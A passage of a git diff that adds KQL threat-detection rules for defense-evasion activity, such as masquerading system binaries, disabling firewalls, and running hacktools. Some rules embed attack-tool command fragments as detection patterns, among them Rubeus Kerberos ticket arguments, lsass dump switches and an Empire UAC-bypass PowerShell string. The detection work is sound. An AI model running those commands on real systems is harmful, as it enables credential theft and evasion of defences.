".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql new file mode 100644 index 00000000..eade8ee0 --- /dev/null +++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql @@ -0,0 +1,14 @@ +// Title: Files With System DLL Name In Unsuspected Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). +It is highly recommended to perform an initial baseline before using this rule in production. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Third party software might bundle specific versions of system DLLs. + +DeviceFileEvents +| where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql new file mode 100644 index 00000000..050b2c5d --- /dev/null +++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql @@ -0,0 +1,15 @@ +// Title: Files With System Process Name In Unsuspected Locations +// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-26 +// Level: medium +// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). +It is highly recommended to perform an initial baseline before using this rule in production. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - System processes copied outside their default folders for testing purposes +// - Third party software naming their software with the same names as the processes mentioned here + +DeviceFileEvents +| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql new file mode 100644 index 00000000..21ae1916 --- /dev/null +++ b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql @@ -0,0 +1,10 @@ +// Title: Filter Driver Unloaded Via Fltmc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-13 +// Level: medium +// Description: Detect filter driver unloading activity via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql new file mode 100644 index 00000000..efa1b78c --- /dev/null +++ b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql @@ -0,0 +1,10 @@ +// Title: Findstr Launching .lnk File +// Author: Trent Liffick +// Date: 2020-05-01 +// Level: medium +// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003 + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql new file mode 100644 index 00000000..d8be9c5c --- /dev/null +++ b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: Firewall Disabled via Netsh.EXE +// Author: Fatih Sirin +// Date: 2019-11-01 +// Level: medium +// Description: Detects netsh commands that turns off the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql new file mode 100644 index 00000000..50e6d47e --- /dev/null +++ b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql @@ -0,0 +1,13 @@ +// Title: Firewall Rule Deleted Via Netsh.EXE +// Author: frack113 +// Date: 2022-08-14 +// Level: medium +// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents +| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql new file mode 100644 index 00000000..2cf9e702 --- /dev/null +++ b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql @@ -0,0 +1,13 @@ +// Title: Firewall Rule Update Via Netsh.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents +| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql new file mode 100644 index 00000000..1a816e52 --- /dev/null +++ b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql @@ -0,0 +1,12 @@ +// Title: Flush Iptables Ufw Chain +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-18 +// Level: medium +// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Network administrators + +DeviceProcessEvents +| where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql new file mode 100644 index 00000000..0d178633 --- /dev/null +++ b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql @@ -0,0 +1,12 @@ +// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators removing applications (should always be investigated) + +DeviceRegistryEvents +| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql new file mode 100644 index 00000000..53d5ba90 --- /dev/null +++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql @@ -0,0 +1,11 @@ +// Title: Forfiles.EXE Child Process Masquerading +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2024-01-05 +// Level: high +// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql new file mode 100644 index 00000000..39f9eaa4 --- /dev/null +++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql @@ -0,0 +1,15 @@ +// Title: Fsutil Suspicious Invocation +// Author: Ecco, E.M. Anhaus, oscd.community +// Date: 2019-09-26 +// Level: high +// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). +Might be used by ransomwares during the attack (seen by NotPetya and others). + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql new file mode 100644 index 00000000..a6c7ac31 --- /dev/null +++ b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql @@ -0,0 +1,12 @@ +// Title: Gatekeeper Bypass via Xattr +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects macOS Gatekeeper bypass via xattr utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/Defense Evasion/gpscript_execution.kql new file mode 100644 index 00000000..00f02a38 --- /dev/null +++ b/KQL/rules/Defense Evasion/gpscript_execution.kql @@ -0,0 +1,12 @@ +// Title: Gpscript Execution +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate uses of logon scripts distributed via group policy + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql new file mode 100644 index 00000000..36d60cb5 --- /dev/null +++ b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql @@ -0,0 +1,10 @@ +// Title: Greedy File Deletion Using Del +// Author: frack113 , X__Junior (Nextron Systems) +// Date: 2021-12-02 +// Level: medium +// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql new file mode 100644 index 00000000..d1537ee7 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql @@ -0,0 +1,13 @@ +// Title: HackTool - EDRSilencer Execution +// Author: @gott_cyber +// Date: 2024-01-02 +// Level: high +// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql new file mode 100644 index 00000000..905d51f1 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Empire PowerShell UAC Bypass +// Author: Ecco +// Date: 2019-08-30 +// Level: critical +// Description: Detects some Empire PowerShell UAC bypass methods +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents +| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql new file mode 100644 index 00000000..74133563 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql @@ -0,0 +1,10 @@ +// Title: HackTool - F-Secure C3 Load by Rundll32 +// Author: Alfie Champion (ajpc500) +// Date: 2021-06-02 +// Level: critical +// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql new file mode 100644 index 00000000..6294992f --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - GMER Rootkit Detector and Remover Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: high +// Description: Detects the execution GMER tool based on image and hash fields. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql new file mode 100644 index 00000000..e32386a6 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - KrbRelayUp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-26 +// Level: high +// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql new file mode 100644 index 00000000..199077a2 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - PowerTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-29 +// Level: high +// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql new file mode 100644 index 00000000..6260e800 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Rubeus Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2018-12-19 +// Level: critical +// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql new file mode 100644 index 00000000..db9b648f --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharpEvtMute Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-07 +// Level: high +// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents +| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql new file mode 100644 index 00000000..e0279736 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Wmiexec Default Powershell Command +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-08 +// Level: high +// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql new file mode 100644 index 00000000..8490e559 --- /dev/null +++ b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - XORDump Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-28 +// Level: high +// Description: Detects suspicious use of XORDump process memory dumping utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Another tool that uses the command line switches of XORdump + +DeviceProcessEvents +| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/Defense Evasion/hh_exe_execution.kql new file mode 100644 index 00000000..97d3017c --- /dev/null +++ b/KQL/rules/Defense Evasion/hh_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: HH.EXE Execution +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Detects the execution of "hh.exe" to open ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 +// False Positives: +// - False positives are expected with legitimate ".CHM" + +DeviceProcessEvents +| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql new file 